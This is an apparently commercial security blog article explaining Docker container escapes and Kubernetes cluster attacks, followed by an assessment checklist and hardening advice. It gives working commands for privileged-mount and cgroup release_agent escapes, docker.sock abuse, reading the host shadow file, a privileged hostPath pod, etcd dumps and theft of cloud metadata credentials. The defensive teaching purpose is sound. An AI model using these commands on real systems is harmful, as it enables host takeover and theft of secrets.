Container Security: Escaping Docker and Attacking Kubernetes

Containers run on shared kernels. Unlike virtual machines, which interpose a hypervisor between a guest operating system and the hardware, containers share the host kernel directly. The isolation that makes containers appear separate comes from Linux namespaces and cgroups — kernel features that restrict visibility and resource access, not features that enforce hard security boundaries.

This distinction matters for security assessments. A misconfigured container is not just a compromised application. It is a foothold on the host, and in an orchestrated environment, potentially a path to every workload in the cluster.

The Privilege Hierarchy in Containerized Environments

Before examining specific escape paths, it helps to understand what "full compromise" means in each layer of a containerized stack.

Container process compromise means code execution within the container's filesystem and namespace with the container's privileges. The attacker can read files the application can read, make network connections the container's network policy allows, and interact with any APIs the container's service account can reach.

Host compromise means the container's isolation has been bypassed and the attacker has access to the underlying node — its filesystem, its processes, its network interfaces, and any other workloads running on it.

Cluster compromise means the attacker can deploy workloads, read secrets, and control configuration across the entire Kubernetes cluster, regardless of which namespace or node they started on.

Container escapes move an attacker from the first level to the second. Kubernetes misconfigurations often provide a direct path to the third.

Docker Container Escapes

Privileged Containers

The most direct path from container to host is the --privileged flag. A container launched with docker run --privileged has all Linux capabilities enabled, no seccomp profile enforced, and no AppArmor restrictions applied. The container can interact with the host kernel as if it were running natively.

The canonical escape is straightforward:

bash

# Inside a privileged container
fdisk -l                          # identify host block devices
mkdir /mnt/host
mount /dev/xvda1 /mnt/host        # mount the host filesystem
chroot /mnt/host                  # enter the host root

After the chroot, the attacker operates in the host filesystem with root privileges. Adding a backdoor user, writing an SSH authorized key, or installing a cron job is trivial from this position.

A second path that does not require knowing the block device is abusing host cgroup access:

bash

# Privileged containers can write to host cgroup release agents
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp
mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=$(sed -n 's/.*perdir=\([^,]*\).*/\1/p' /etc/mtab | head -1)
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "id > /output" >> /cmd    # replace with actual payload
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# The release agent executes on the host when the cgroup empties

This technique executes a command on the host through the cgroup release agent mechanism without requiring the host filesystem to be mounted first.

Mounted Docker Socket

The Docker socket (/var/run/docker.sock) is the Unix socket through which Docker clients communicate with the Docker daemon. The daemon runs as root and has full control over every container on the host.

When a container has the Docker socket bind-mounted into it — a practice common in CI/CD environments where pipelines need to build and run containers — any process in that container can talk to the Docker daemon directly.

bash

# Inside a container with /var/run/docker.sock mounted
docker run -v /:/host -it --rm ubuntu:22.04 chroot /host

This single command, executed from inside a container with socket access, launches a new privileged container with the host filesystem mounted, then enters a shell with host root access. The container process effectively controls the Docker daemon and can use it to escape.

Testing for a mounted Docker socket requires only checking whether the path exists and is writable. Curl against the Docker API socket confirms accessibility:

bash

curl --unix-socket /var/run/docker.sock http://localhost/version

A successful response confirms full Docker API access and immediate host compromise potential.

Docker allows specific host namespaces to be shared with containers: --pid=host, --network=host, --ipc=host. Each trades isolation for capability in ways that create security exposure.

--pid=host is particularly dangerous from an assessment perspective. A container with host PID namespace access can see all processes running on the host and send signals to them. More practically, it can access /proc/<pid>/root for any host process, which is a symlink to the root filesystem of the process's mount namespace — the host filesystem:

bash

# Inside a container with --pid=host
ls /proc/1/root/           # lists the host root filesystem
cp /proc/1/root/etc/shadow /tmp/shadow   # reads host shadow file

--network=host places the container in the host's network namespace, making it possible to listen on host ports and access host network interfaces directly — bypassing any container network policy that would otherwise restrict traffic.

Kubernetes Cluster Attacks

Service Account Token Abuse

Every Kubernetes pod runs under a service account. Unless the pod spec sets automountServiceAccountToken: false, a JWT token for the service account is automatically mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.

The token can authenticate to the Kubernetes API server:

bash

TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
APISERVER=https://kubernetes.default.svc
 
# Enumerate what the service account can do
curl --cacert $CACERT --header "Authorization: Bearer $TOKEN" \
  "$APISERVER/api/v1/namespaces/default/secrets"

The critical question is what RBAC permissions are bound to the service account. Even if no explicit role binding exists, Kubernetes ships with a system:discovery role that is bound to all authenticated users by default, allowing the token to enumerate cluster resources.

More dangerous is the common pattern of binding the cluster-admin ClusterRole to the default service account in a namespace, or granting secrets:get to a service account that runs an application with untrusted input. With secrets:get on the cluster scope, the token can read every secret in every namespace — including other applications' database credentials, TLS private keys, and tokens for external services.

RBAC Privilege Escalation

RBAC misconfigurations fall into predictable patterns. The most impactful:

Wildcard permissions on resources. A role with verbs: ['*'] on resources: ['*'] is equivalent to cluster-admin for the service account. Wildcards in RBAC rules appear frequently when administrators create roles quickly and intend to restrict them later.

Create-pod access. A service account that can create pods can create a privileged pod with hostPID: true, hostNetwork: true, and a hostPath volume mounting the host filesystem. This is a full host escape through the API server:

yaml

apiVersion: v1
kind: Pod
spec:
  hostPID: true
  hostNetwork: true
  containers:
  - name: escape
    image: ubuntu
    command: ["/bin/bash"]
    args: ["-c", "chroot /host bash"]
    securityContext:
      privileged: true
    volumeMounts:
    - name: host
      mountPath: /host
  volumes:
  - name: host
    hostPath:
      path: /

Manage-roles or bind-clusterroles access. The ability to create or modify role bindings is effectively the ability to grant oneself any permission in the cluster. An attacker with create on rolebindings can create a binding that grants cluster-admin to their service account.

Exec into pods. The pods/exec subresource allows attaching to running containers. An attacker with this permission can execute commands in any pod in scope — including sensitive workloads like database administrators, secrets managers, or monitoring agents.

etcd Access

etcd is the key-value store that Kubernetes uses to persist all cluster state — including every Secret object, every Service Account token, and all configuration. By default, Kubernetes secrets are stored in etcd with only base64 encoding, not encrypted at rest.

An attacker with network access to the etcd endpoint (typically port 2379) and a valid client certificate can dump the entire cluster state:

bash

etcdctl --endpoints=https://etcd-host:2379 \
  --cacert=/etc/kubernetes/pki/etcd/ca.crt \
  --cert=/etc/kubernetes/pki/etcd/server.crt \
  --key=/etc/kubernetes/pki/etcd/server.key \
  get / --prefix --keys-only

etcd should only be accessible from the API server and should require mutual TLS with a restricted CA. Assessment targets where etcd listens on a broader interface, or where the certificates are accessible from within a compromised pod, represent critical findings.

Cloud Metadata Endpoint Access

In cloud-managed Kubernetes environments, each node is a cloud instance with an associated instance metadata endpoint. On AWS, this is the Instance Metadata Service at 169.254.169.254. On GCP it is metadata.google.internal. On Azure it is 169.254.169.254 with a different API.

The metadata endpoint returns temporary credentials for the instance's IAM role without authentication. If the node's instance role has permissions beyond what the cluster itself needs — common when operators grant broad cloud API access for node autoscaling, load balancer management, or storage provisioning — any pod running on that node can retrieve those credentials:

bash

# From inside a pod on AWS
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Returns the role name, then:
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/node-role
# Returns AccessKeyId, SecretAccessKey, SessionToken

With these credentials, the attacker can make calls to the cloud API with the permissions of the node role — potentially listing and downloading S3 buckets, describing EC2 infrastructure, assuming other IAM roles, or escalating further within the cloud environment.

IMDSv2 (AWS) requires a session-oriented request with a token obtained via PUT, which adds a layer of protection. But it only applies if explicitly configured. Clusters that have not enforced IMDSv2 on their node groups remain exposed.

Network policy can block pods from reaching 169.254.169.254, but only if network policy is enforced and the relevant egress rules are present.

Assessment Methodology

A container security assessment follows a consistent progression from the inside out.

From within a pod:

Read the mounted service account token and query the API server — enumerate what the token can do
Check for /var/run/docker.sock — its presence enables immediate host compromise
Check the pod's security context: cat /proc/1/status | grep Cap reveals current capabilities; privileged: true is directly observable from inside
Attempt to reach the cloud metadata endpoint — a successful response warrants credential retrieval and cloud privilege analysis
Check environment variables for secrets passed as env vars rather than volumes

From the Kubernetes API:

Enumerate ClusterRoleBindings for the default service account and any application service accounts
Look for any subject with create access to pods, role bindings, or cluster role bindings
Check for secrets accessible to assessed service accounts — the presence of dockerconfigjson secrets or cloud credentials in secrets indicates infrastructure-level access
Review admission controller configuration — the absence of a pod security admission policy or OPA/Gatekeeper allows arbitrary pod specs including privileged workloads

Infrastructure review:

Confirm etcd is not accessible from the pod network
Confirm the API server's anonymous-auth is disabled
Verify that node instance roles follow least privilege
Check whether network policy enforces egress restrictions to the metadata endpoint

Hardening Guidance

The most impactful mitigations reduce the blast radius when a workload is compromised.

Disable service account token auto-mounting for pods that do not need API server access. Set automountServiceAccountToken: false in the pod spec or the service account itself.

Apply Pod Security Standards using Kubernetes' built-in admission controller. The restricted profile prohibits privileged containers, host namespace sharing, and host volume mounts. The baseline profile blocks the most common escape vectors while permitting most legitimate workloads.

Enforce least-privilege RBAC. Audit ClusterRoleBindings regularly. The default service account should have no bindings beyond the cluster defaults. Application service accounts should have narrowly scoped roles in their namespace only.

Block cloud metadata endpoints with network policy egress rules that deny traffic to link-local addresses from all pods except those that specifically require it.

Enable etcd encryption at rest using Kubernetes' EncryptionConfiguration. This does not prevent an attacker with etcd access from reading data, but it prevents offline analysis of etcd backups.

Audit container images for setuid binaries and excessive capabilities. The presence of nsenter, mount, fdisk, or other administrative binaries in a container image expands the options available to an attacker who achieves code execution.

Container security is layered. No single control makes a cluster uncompromisable. The goal is to ensure that a container compromise does not automatically translate to host or cluster compromise — and that each step toward escalation is visible in logs.

For a technical assessment of your containerized infrastructure, get in touch.

Container Security: Escaping Docker and Attacking Kubernetes

Container Security: Escaping Docker and Attacking Kubernetes

The Privilege Hierarchy in Containerized Environments

Docker Container Escapes

Privileged Containers

Mounted Docker Socket

Kubernetes Cluster Attacks

Service Account Token Abuse

RBAC Privilege Escalation

etcd Access

Cloud Metadata Endpoint Access

Assessment Methodology

Hardening Guidance

Get new knowledge base articles in your inbox

Need your application tested?

From the Knowledge Base

Server-Side Request Forgery (SSRF): When Your Server Becomes the Attacker

What We Test: Applications, APIs, Authentication, Infrastructure

Password Reset Security: Common Flaws in Account Recovery Flows

Summary

Key Takeaways

Frequently Asked Questions

Container Security: Escaping Docker and Attacking Kubernetes

Container Security: Escaping Docker and Attacking Kubernetes

The Privilege Hierarchy in Containerized Environments

Docker Container Escapes

Privileged Containers

Mounted Docker Socket

Host Namespace Sharing

Kubernetes Cluster Attacks

Service Account Token Abuse

RBAC Privilege Escalation

etcd Access

Cloud Metadata Endpoint Access

Assessment Methodology

Hardening Guidance

Get new knowledge base articles in your inbox

Need your application tested?

Related Posts

From the Knowledge Base

Server-Side Request Forgery (SSRF): When Your Server Becomes the Attacker

What We Test: Applications, APIs, Authentication, Infrastructure

Password Reset Security: Common Flaws in Account Recovery Flows

Summary

Key Takeaways

Frequently Asked Questions